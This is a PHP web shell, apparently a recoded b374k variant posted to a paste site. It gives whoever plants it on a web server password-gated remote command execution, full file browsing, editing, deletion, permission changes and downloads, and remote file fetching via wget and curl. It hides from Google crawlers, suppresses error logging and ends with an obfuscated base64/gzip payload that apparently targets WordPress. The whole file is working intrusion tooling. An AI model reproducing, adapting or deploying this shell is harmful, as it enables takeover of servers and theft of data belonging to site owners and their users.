· 6 years ago · Jan 12, 2020, 08:26 PM
1<?php
2
3/* (Web Shell b374k Recoded By KEFIEX404 IDBTE4M ") */
4$auth_pass = "b386fcd02ebe1b1cd56e4630c9ca609a";
5$color = "#df5";
6$default_action = 'FilesMan';
7$default_use_ajax = true;
8$default_charset = 'Windows-1251';
9@define('SELF_PATH', __FILE__);
10@setcookie("inject", "active", time() + 3600 * 24 * 7);
11if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
12 header('HTTP/1.0 404 Not Found');
13
14}
15@session_start();
16@error_reporting(0);
17@ini_set('error_log',NULL);
18@ini_set('log_errors',0);
19@ini_set('max_execution_time',0);
20@ini_set('output_buffering',0);
21@ini_set('display_errors', 0);
22@set_time_limit(0);
23@set_magic_quotes_runtime(0);
24@define('VERSION', '2.1');
25$asui = getcwd() . "/";
26if( get_magic_quotes_gpc() ) {
27 function stripslashes_array($array) {
28 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
29 }
30 $_POST = stripslashes_array($_POST);
31}
32function printLogin() {
33 ?>
34
35 <center>
36 <form method=post>
37 <input type=password name=pass>
38 </form></center>
39 <?php
40 exit;
41}
42if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
43 if( empty( $auth_pass ) ||
44 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
45 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
46 else
47 printLogin();
48
49@ini_set('log_errors',0);
50@ini_set('output_buffering',0);
51
52if(isset($_GET['dl']) && ($_GET['dl'] != "")){
53 $file = $_GET['dl'];
54 $filez = @file_get_contents($file);
55 header("Content-type: application/octet-stream");
56 header("Content-length: ".strlen($filez));
57 header("Content-disposition: attachment; filename=\"".basename($file)."\";");
58 echo $filez;
59 exit;
60}
61elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
62 $file = $_GET['dlgzip'];
63 $filez = gzencode(@file_get_contents($file));
64 header("Content-Type:application/x-gzip\n");
65 header("Content-length: ".strlen($filez));
66 header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
67 echo $filez;
68 exit;
69}
70// view image
71if(isset($_GET['img'])){
72 @ob_clean();
73 $d = magicboom($_GET['y']);
74 $f = $_GET['img'];
75 $inf = @getimagesize($d.$f);
76 $ext = explode($f,".");
77 $ext = $ext[count($ext)-1];
78 @header("Content-type: ".$inf["mime"]);
79 @header("Cache-control: public");
80 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
81 @header("Cache-control: max-age=".(60*60*24*7));
82 @readfile($d.$f);
83 exit;
84}
85
86// server software
87$software = getenv("SERVER_SOFTWARE");
88// check safemode
89if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
90// uname -a
91$system = @php_uname();
92// mysql
93function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
94function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
95function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
96function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
97function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
98// check os
99if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
100else $win = FALSE;
101// change directory
102if(isset($_GET['y'])){
103 if(@is_dir($_GET['view'])){
104 $pwd = $_GET['view'];
105 @chdir($pwd);
106 }
107 else{
108 $pwd = $_GET['y'];
109 @chdir($pwd);
110 }
111}
112//hdd
113function convertByte($s) {
114if($s >= 1073741824)
115return sprintf('%1.2f',$s / 1073741824 ).' GB';
116elseif($s >= 1048576)
117return sprintf('%1.2f',$s / 1048576 ) .' MB';
118elseif($s >= 1024)
119return sprintf('%1.2f',$s / 1024 ) .' KB';
120else
121return $s .' B';
122}
123
124// username, id, shell prompt and working directory
125if(!$win){
126 if(!$user = rapih(exe("whoami"))) $user = "";
127 if(!$id = rapih(exe("id"))) $id = "";
128 $prompt = $user." \$ ";
129 $pwd = @getcwd().DIRECTORY_SEPARATOR;
130}
131else {
132 $user = @get_current_user();
133 $id = $user;
134 $prompt = $user." >";
135 $pwd = realpath(".")."\\";
136 // find drive letters
137 $v = explode("\\",$d);
138 $v = $v[0];
139 foreach (range("A","Z") as $letter)
140 {
141 $bool = @is_dir($letter.":\\");
142 if ($bool)
143 {
144 $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
145 if ($letter.":" != $v) {$letters .= $letter;}
146 else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
147 $letters .= " ]</a> ";
148 }
149 }
150}
151
152function testoracle() {
153 if (function_exists('ocilogon')) { return showstat("on"); }
154 else { return showstat("off"); }
155 }
156
157function testmssql() {
158 if (function_exists('mssql_connect')) { return showstat("on"); }
159 else { return showstat("off"); }
160 }
161
162 function showdisablefunctions() {
163 if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
164 else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
165 }
166
167if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
168else $posix = FALSE;
169// server ip
170$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
171// your ip ;-)
172$my_ip = $_SERVER['REMOTE_ADDR'];
173$admin_id=$_SERVER['SERVER_ADMIN'];
174$bindport = "13123";
175$bindport_pass = "b374k";
176
177// separate the working direcotory
178$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
179$pwdurl = "";
180for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
181 $pathz = "";
182 for($j = 0 ; $j <= $i ; $j++){
183 $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
184 }
185 $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
186}
187
188// rename file or folder
189if(isset($_POST['rename'])){
190 $old = $_POST['oldname'];
191 $new = $_POST['newname'];
192 @rename($pwd.$old,$pwd.$new);
193 $file = $pwd.$new;
194}
195if(isset($_POST['chmod'])){
196 $name = $_POST['name'];
197 $value = $_POST['newvalue'];
198if (strlen($value)==3){
199 $value = 0 . "" . $value;}
200 @chmod($pwd.$name,octdec($value));
201 $file = $pwd.$name;}
202
203if(isset($_POST['chmod_folder'])){
204 $name = $_POST['name'];
205 $value = $_POST['newvalue'];
206if (strlen($value)==3){
207 $value = 0 . "" . $value;}
208 @chmod($pwd.$name,octdec($value));
209 $file = $pwd.$name;}
210
211
212// print useful info
213$buff = "Software : <b>".$software."</b><br />";
214$buff .= "System OS : <b>".$system."</b><br />";
215if($id != "") $buff .= "ID : <b>".$id."</b><br />";
216$buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";
217$buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
218$buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
219if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
220else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
221$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
222$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
223$buff .= "<font color=00ff00 ><b>".$letters." > ".$pwdurl."</b></font>";
224
225
226
227
228function rapih($text){
229 return trim(str_replace("<br />","",$text));
230}
231
232function magicboom($text){
233 if (!get_magic_quotes_gpc()) {
234 return $text;
235 }
236 return stripslashes($text);
237}
238
239function showdir($pwd,$prompt){
240 $fname = array();
241 $dname = array();
242 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
243 else $posix = FALSE;
244 $user = "????:????";
245 if($dh = @scandir($pwd)){
246 foreach($dh as $file){
247 if(is_dir($file)){
248 $dname[] = $file;
249 }
250 elseif(is_file($file)){
251 $fname[] = $file;
252 }
253 }
254 }
255 else{
256 if($dh = @opendir($pwd)){
257 while($file = @readdir($dh)){
258 if(@is_dir($file)){
259 $dname[] = $file;
260 }
261 elseif(@is_file($file)){
262 $fname[] = $file;
263 }
264 }
265 @closedir($dh);
266 }
267 }
268
269
270 sort($fname);
271 sort($dname);
272 $path = @explode(DIRECTORY_SEPARATOR,$pwd);
273 $tree = @sizeof($path);
274 $parent = "";
275 $buff = "
276 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
277 <table class=\"explore\">
278 <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
279
280 ";
281 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
282 else $parent = $pwd;
283
284 foreach($dname as $folder){
285 if($folder == ".") {
286 if(!$win && $posix){
287 $name=@posix_getpwuid(@fileowner($folder));
288 $group=@posix_getgrgid(@filegroup($folder));
289 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
290 }
291 else {
292 $owner = $user;
293 }
294 $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
295 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
296 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
297
298 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
299 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
300 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
301 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
302 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
303 </form></td>
304
305 </tr>
306
307 ";
308 }
309 elseif($folder == "..") {
310 if(!$win && $posix){
311 $name=@posix_getpwuid(@fileowner($folder));
312 $group=@posix_getgrgid(@filegroup($folder));
313 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
314 }
315 else {
316 $owner = $user;
317 }
318 $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
319 <td style=\"text-align:center;\">".$owner."</td>
320 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
321
322 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
323 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
324 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
325 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
326 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
327 </form>
328 </td></tr>";
329 }
330 else {
331 if(!$win && $posix){
332 $name=@posix_getpwuid(@fileowner($folder));
333 $group=@posix_getgrgid(@filegroup($folder));
334 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
335 }
336 else {
337 $owner = $user;
338 }
339 $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
340
341 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
342 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
343 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
344 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
345 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
346 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
347 <td><center>
348 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
349
350 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
351 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
352 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
353 <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
354 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
355 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
356 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
357 }
358 }
359
360 foreach($fname as $file){
361 $full = $pwd.$file;
362 if(!$win && $posix){
363 $name=@posix_getpwuid(@fileowner($folder));
364 $group=@posix_getgrgid(@filegroup($folder));
365 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
366 }
367 else {
368 $owner = $user;
369 }
370 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
371
372 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
373 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
374 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
375 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
376 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
377 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
378 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
379
380 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
381<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
382<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
383<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
384<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
385 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
386 <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
387 }
388 $buff .= "</table>";
389 return $buff;
390}
391
392function ukuran($file){
393 if($size = @filesize($file)){
394 if($size <= 1024) return $size;
395 else{
396 if($size <= 1024*1024) {
397 $size = @round($size / 1024,2);;
398 return "$size kb";
399 }
400 else {
401 $size = @round($size / 1024 / 1024,2);
402 return "$size mb";
403 }
404 }
405 }
406 else return "???";
407}
408function exe($cmd){
409 if(function_exists('system')) {
410 @ob_start();
411 @system($cmd);
412 $buff = @ob_get_contents();
413 @ob_end_clean();
414 return $buff;
415 }
416 elseif(function_exists('exec')) {
417 @exec($cmd,$results);
418 $buff = "";
419 foreach($results as $result){
420 $buff .= $result;
421 }
422 return $buff;
423 }
424 elseif(function_exists('passthru')) {
425 @ob_start();
426 @passthru($cmd);
427 $buff = @ob_get_contents();
428 @ob_end_clean();
429 return $buff;
430 }
431 elseif(function_exists('shell_exec')){
432 $buff = @shell_exec($cmd);
433 return $buff;
434 }
435}
436
437function tulis($file,$text){
438 $textz = gzinflate(base64_decode($text));
439 if($filez = @fopen($file,"w"))
440 {
441 @fputs($filez,$textz);
442 @fclose($file);
443 }
444}
445
446function ambil($link,$file) {
447 if($fp = @fopen($link,"r")){
448 while(!feof($fp)) {
449 $cont.= @fread($fp,1024);
450 }
451 @fclose($fp);
452 $fp2 = @fopen($file,"w");
453 @fwrite($fp2,$cont);
454 @fclose($fp2);
455 }
456}
457
458function which($pr){
459 $path = exe("which $pr");
460 if(!empty($path)) { return trim($path); } else { return trim($pr); }
461}
462
463function download($cmd,$url){
464 $namafile = basename($url);
465 switch($cmd) {
466 case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
467 case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
468 case 'wfread' : ambil($wurl,$namafile);break;
469 case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
470 case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
471 case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
472 case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
473 default: break;
474 }
475 return $namafile;
476}
477
478function get_perms($file)
479{
480 if($mode=@fileperms($file)){
481 $perms='';
482 $perms .= ($mode & 00400) ? 'r' : '-';
483 $perms .= ($mode & 00200) ? 'w' : '-';
484 $perms .= ($mode & 00100) ? 'x' : '-';
485 $perms .= ($mode & 00040) ? 'r' : '-';
486 $perms .= ($mode & 00020) ? 'w' : '-';
487 $perms .= ($mode & 00010) ? 'x' : '-';
488 $perms .= ($mode & 00004) ? 'r' : '-';
489 $perms .= ($mode & 00002) ? 'w' : '-';
490 $perms .= ($mode & 00001) ? 'x' : '-';
491 return $perms;
492 }
493 else return "??????????";
494}
495function ambilKata($param, $kata1, $kata2){
496 if(strpos($param, $kata1) === FALSE) return FALSE;
497 if(strpos($param, $kata2) === FALSE) return FALSE;
498 $start = strpos($param, $kata1) + strlen($kata1);
499 $end = strpos($param, $kata2, $start);
500 $return = substr($param, $start, $end - $start);
501 return $return;
502}
503function clearspace($text){
504 return str_replace(" ","_",$text);
505}
506function w($dir,$perm) {
507 if(!is_writable($dir)) {
508 return "<font color=red>".$perm."</font>";
509 } else {
510 return "<font color=lime>".$perm."</font>";
511 }
512}
513function r($dir,$perm) {
514 if(!is_readable($dir)) {
515 return "<font color=red>".$perm."</font>";
516 } else {
517 return "<font color=lime>".$perm."</font>";
518 }
519}
520
521
522$wpress="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